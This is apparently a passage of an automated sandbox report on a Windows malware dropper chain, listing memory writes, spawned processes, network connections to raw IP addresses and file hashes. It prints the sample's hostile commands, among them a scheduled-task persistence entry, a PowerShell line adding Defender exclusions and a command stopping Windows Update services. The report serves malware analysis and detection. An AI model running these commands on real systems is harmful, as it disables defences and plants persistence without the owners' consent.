Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1852 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe
PID 1852 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe
PID 1852 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe
PID 1852 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe
PID 1852 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe
PID 1852 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe
PID 1852 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe
PID 2724 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe
PID 2724 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe
PID 2724 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe
PID 2724 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe
PID 2724 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe
PID 2724 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe
PID 2724 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe
PID 2584 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2584 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2584 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2584 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2584 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2584 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2584 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2584 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2584 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2584 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2584 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\SysWOW64\WerFault.exe
PID 2584 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\SysWOW64\WerFault.exe
PID 2584 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\SysWOW64\WerFault.exe
PID 2584 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\SysWOW64\WerFault.exe
PID 2584 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\SysWOW64\WerFault.exe
PID 2584 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\SysWOW64\WerFault.exe
PID 2584 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\SysWOW64\WerFault.exe
PID 1196 wrote to memory of 3016 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\97CD.exe
PID 1196 wrote to memory of 3016 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\97CD.exe
PID 1196 wrote to memory of 3016 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\97CD.exe
PID 1196 wrote to memory of 3016 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\97CD.exe
PID 1196 wrote to memory of 3016 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\97CD.exe
PID 1196 wrote to memory of 3016 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\97CD.exe
PID 1196 wrote to memory of 3016 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\97CD.exe
PID 3016 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\97CD.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe
PID 3016 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\97CD.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe
PID 3016 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\97CD.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe
PID 3016 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\97CD.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe
PID 3016 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\97CD.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe
PID 3016 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\97CD.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe
PID 3016 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\97CD.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe
PID 1196 wrote to memory of 2704 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A1CC.exe
PID 1196 wrote to memory of 2704 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A1CC.exe
PID 1196 wrote to memory of 2704 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A1CC.exe
PID 1196 wrote to memory of 2704 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A1CC.exe
PID 2704 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\A1CC.exe C:\Windows\SysWOW64\WerFault.exe
PID 2704 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\A1CC.exe C:\Windows\SysWOW64\WerFault.exe
PID 2704 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\A1CC.exe C:\Windows\SysWOW64\WerFault.exe
PID 2704 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\A1CC.exe C:\Windows\SysWOW64\WerFault.exe
PID 1196 wrote to memory of 1244 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\BCCC.bat
PID 1196 wrote to memory of 1244 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\BCCC.bat
PID 1196 wrote to memory of 1244 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\BCCC.bat
PID 1196 wrote to memory of 1244 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\BCCC.bat
PID 2440 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Im3XM9DI.exe
PID 2440 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Im3XM9DI.exe
PID 2440 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Im3XM9DI.exe
PID 2440 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Im3XM9DI.exe
PID 2440 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Im3XM9DI.exe
PID 2440 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Im3XM9DI.exe
PID 2440 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Im3XM9DI.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe

"C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe"

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 36

C:\Users\Admin\AppData\Local\Temp\97CD.exe

C:\Users\Admin\AppData\Local\Temp\97CD.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe

C:\Users\Admin\AppData\Local\Temp\A1CC.exe

C:\Users\Admin\AppData\Local\Temp\A1CC.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 132

C:\Users\Admin\AppData\Local\Temp\BCCC.bat

"C:\Users\Admin\AppData\Local\Temp\BCCC.bat"

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Im3XM9DI.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Im3XM9DI.exe

C:\Users\Admin\AppData\Local\Temp\C46B.exe

C:\Users\Admin\AppData\Local\Temp\C46B.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 132

C:\Users\Admin\AppData\Local\Temp\CC0A.exe

C:\Users\Admin\AppData\Local\Temp\CC0A.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C2A3.tmp\C3DC.tmp\C5A2.bat C:\Users\Admin\AppData\Local\Temp\BCCC.bat"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wg5mI1Lf.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wg5mI1Lf.exe

C:\Users\Admin\AppData\Local\Temp\CDDF.exe

C:\Users\Admin\AppData\Local\Temp\CDDF.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\TT7kp0pz.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\TT7kp0pz.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1ZD37Ls8.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1ZD37Ls8.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 280

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:996 CREDAT:340993 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1056 CREDAT:275457 /prefetch:2

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\10E8.exe

C:\Users\Admin\AppData\Local\Temp\10E8.exe

C:\Users\Admin\AppData\Local\Temp\5355.exe

C:\Users\Admin\AppData\Local\Temp\5355.exe

C:\Users\Admin\AppData\Local\Temp\572D.exe

C:\Users\Admin\AppData\Local\Temp\572D.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1736 -s 528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 508

C:\Users\Admin\AppData\Local\Temp\5AC6.exe

C:\Users\Admin\AppData\Local\Temp\5AC6.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

Network

Country Destination Domain Proto
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.facebook.com udp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 8.8.8.8:53 facebook.com udp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.35:443 facebook.com tcp
CZ 157.240.30.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
CZ 157.240.30.35:443 fbcdn.net tcp
CZ 157.240.30.35:443 fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 fbsbx.com udp
CZ 157.240.30.35:443 fbsbx.com tcp
CZ 157.240.30.35:443 fbsbx.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
US 8.8.8.8:53 accounts.youtube.com udp
NL 142.250.179.206:443 accounts.youtube.com tcp
NL 142.250.179.206:443 accounts.youtube.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 85.209.176.171:80 85.209.176.171 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe

MD5 a42bb483360857d54a8187b28fd726a3
SHA1 98f94fda7cf8aa042c1f3645a5bde7fa3c0080e5
SHA256 6446edc0dd30404b8fedcb11b83fe99f66ed6935dad65dbc9cb40314427f256d
SHA512 5395266a85f1be8b94763e2d860c2a7ff0e43dbf460876f40a9c26522600f1b07a2899d05e264fa2bf527b5c80b27edce6e67db0fd3fc1fa75f073995e36e118

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe

MD5 a42bb483360857d54a8187b28fd726a3
SHA1 98f94fda7cf8aa042c1f3645a5bde7fa3c0080e5
SHA256 6446edc0dd30404b8fedcb11b83fe99f66ed6935dad65dbc9cb40314427f256d
SHA512 5395266a85f1be8b94763e2d860c2a7ff0e43dbf460876f40a9c26522600f1b07a2899d05e264fa2bf527b5c80b27edce6e67db0fd3fc1fa75f073995e36e118

\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe

MD5 a42bb483360857d54a8187b28fd726a3
SHA1 98f94fda7cf8aa042c1f3645a5bde7fa3c0080e5
SHA256 6446edc0dd30404b8fedcb11b83fe99f66ed6935dad65dbc9cb40314427f256d
SHA512 5395266a85f1be8b94763e2d860c2a7ff0e43dbf460876f40a9c26522600f1b07a2899d05e264fa2bf527b5c80b27edce6e67db0fd3fc1fa75f073995e36e118

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe

MD5 a42bb483360857d54a8187b28fd726a3
SHA1 98f94fda7cf8aa042c1f3645a5bde7fa3c0080e5
SHA256 6446edc0dd30404b8fedcb11b83fe99f66ed6935dad65dbc9cb40314427f256d
SHA512 5395266a85f1be8b94763e2d860c2a7ff0e43dbf460876f40a9c26522600f1b07a2899d05e264fa2bf527b5c80b27edce6e67db0fd3fc1fa75f073995e36e118

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

MD5 a31db6bfd8052c52507eb4c9353db812
SHA1 821f77171504f836fb3cecd0d253f0303d62b97e
SHA256 7346af4288b20934de0fde6d9d4a097f8a8d72e518ad818e2aca824de25b29b2
SHA512 c7b4f53e063023bd0ed020244bc9d58f1575c4b603ff40d6da4d89d83fe43e743d6ef04a0c5b5d09757ac8aa6c697d745d520b062674173ccd69d0393eca38b1

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

MD5 a31db6bfd8052c52507eb4c9353db812
SHA1 821f77171504f836fb3cecd0d253f0303d62b97e
SHA256 7346af4288b20934de0fde6d9d4a097f8a8d72e518ad818e2aca824de25b29b2
SHA512 c7b4f53e063023bd0ed020244bc9d58f1575c4b603ff40d6da4d89d83fe43e743d6ef04a0c5b5d09757ac8aa6c697d745d520b062674173ccd69d0393eca38b1

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

MD5 a31db6bfd8052c52507eb4c9353db812
SHA1 821f77171504f836fb3cecd0d253f0303d62b97e
SHA256 7346af4288b20934de0fde6d9d4a097f8a8d72e518ad818e2aca824de25b29b2
SHA512 c7b4f53e063023bd0ed020244bc9d58f1575c4b603ff40d6da4d89d83fe43e743d6ef04a0c5b5d09757ac8aa6c697d745d520b062674173ccd69d0393eca38b1

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

MD5 a31db6bfd8052c52507eb4c9353db812
SHA1 821f77171504f836fb3cecd0d253f0303d62b97e
SHA256 7346af4288b20934de0fde6d9d4a097f8a8d72e518ad818e2aca824de25b29b2
SHA512 c7b4f53e063023bd0ed020244bc9d58f1575c4b603ff40d6da4d89d83fe43e743d6ef04a0c5b5d09757ac8aa6c697d745d520b062674173ccd69d0393eca38b1

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

MD5 a31db6bfd8052c52507eb4c9353db812
SHA1 821f77171504f836fb3cecd0d253f0303d62b97e
SHA256 7346af4288b20934de0fde6d9d4a097f8a8d72e518ad818e2aca824de25b29b2
SHA512 c7b4f53e063023bd0ed020244bc9d58f1575c4b603ff40d6da4d89d83fe43e743d6ef04a0c5b5d09757ac8aa6c697d745d520b062674173ccd69d0393eca38b1

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

MD5 a31db6bfd8052c52507eb4c9353db812
SHA1 821f77171504f836fb3cecd0d253f0303d62b97e
SHA256 7346af4288b20934de0fde6d9d4a097f8a8d72e518ad818e2aca824de25b29b2
SHA512 c7b4f53e063023bd0ed020244bc9d58f1575c4b603ff40d6da4d89d83fe43e743d6ef04a0c5b5d09757ac8aa6c697d745d520b062674173ccd69d0393eca38b1

memory/2800-23-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2800-24-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2800-25-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2800-26-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2800-27-0x0000000000400000-0x0000000000409000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

MD5 a31db6bfd8052c52507eb4c9353db812
SHA1 821f77171504f836fb3cecd0d253f0303d62b97e
SHA256 7346af4288b20934de0fde6d9d4a097f8a8d72e518ad818e2aca824de25b29b2
SHA512 c7b4f53e063023bd0ed020244bc9d58f1575c4b603ff40d6da4d89d83fe43e743d6ef04a0c5b5d09757ac8aa6c697d745d520b062674173ccd69d0393eca38b1

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

MD5 a31db6bfd8052c52507eb4c9353db812
SHA1 821f77171504f836fb3cecd0d253f0303d62b97e
SHA256 7346af4288b20934de0fde6d9d4a097f8a8d72e518ad818e2aca824de25b29b2
SHA512 c7b4f53e063023bd0ed020244bc9d58f1575c4b603ff40d6da4d89d83fe43e743d6ef04a0c5b5d09757ac8aa6c697d745d520b062674173ccd69d0393eca38b1

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

MD5 a31db6bfd8052c52507eb4c9353db812
SHA1 821f77171504f836fb3cecd0d253f0303d62b97e
SHA256 7346af4288b20934de0fde6d9d4a097f8a8d72e518ad818e2aca824de25b29b2
SHA512 c7b4f53e063023bd0ed020244bc9d58f1575c4b603ff40d6da4d89d83fe43e743d6ef04a0c5b5d09757ac8aa6c697d745d520b062674173ccd69d0393eca38b1

memory/1196-31-0x0000000002B40000-0x0000000002B56000-memory.dmp

memory/2800-34-0x0000000000400000-0x0000000000409000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

MD5 a31db6bfd8052c52507eb4c9353db812
SHA1 821f77171504f836fb3cecd0d253f0303d62b97e
SHA256 7346af4288b20934de0fde6d9d4a097f8a8d72e518ad818e2aca824de25b29b2
SHA512 c7b4f53e063023bd0ed020244bc9d58f1575c4b603ff40d6da4d89d83fe43e743d6ef04a0c5b5d09757ac8aa6c697d745d520b062674173ccd69d0393eca38b1

\Users\Admin\AppData\Local\Temp\97CD.exe

MD5 f6d480ab491757c15f2ec4b93d58c316
SHA1 6c4c1880cb5be4518bb45e99948c0c983c76d7bd
SHA256 80f237543360f5ebf130bcbf4609972bbcbaec9866150ffb061ae63750967f5c
SHA512 f5b9c532572a6631695e887eebcccfd049befc5ab83fcfe8047a337ce026949161b49931ba939b34080873e8ae510a8c637a1002ce6a714fa5e38d8e2f51e107

C:\Users\Admin\AppData\Local\Temp\97CD.exe

MD5 f6d480ab491757c15f2ec4b93d58c316
SHA1 6c4c1880cb5be4518bb45e99948c0c983c76d7bd
SHA256 80f237543360f5ebf130bcbf4609972bbcbaec9866150ffb061ae63750967f5c
SHA512 f5b9c532572a6631695e887eebcccfd049befc5ab83fcfe8047a337ce026949161b49931ba939b34080873e8ae510a8c637a1002ce6a714fa5e38d8e2f51e107

C:\Users\Admin\AppData\Local\Temp\97CD.exe

MD5 f6d480ab491757c15f2ec4b93d58c316
SHA1 6c4c1880cb5be4518bb45e99948c0c983c76d7bd
SHA256 80f237543360f5ebf130bcbf4609972bbcbaec9866150ffb061ae63750967f5c
SHA512 f5b9c532572a6631695e887eebcccfd049befc5ab83fcfe8047a337ce026949161b49931ba939b34080873e8ae510a8c637a1002ce6a714fa5e38d8e2f51e107

\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe

MD5 167550480f34b0fd3b23b51ba5bf68b1
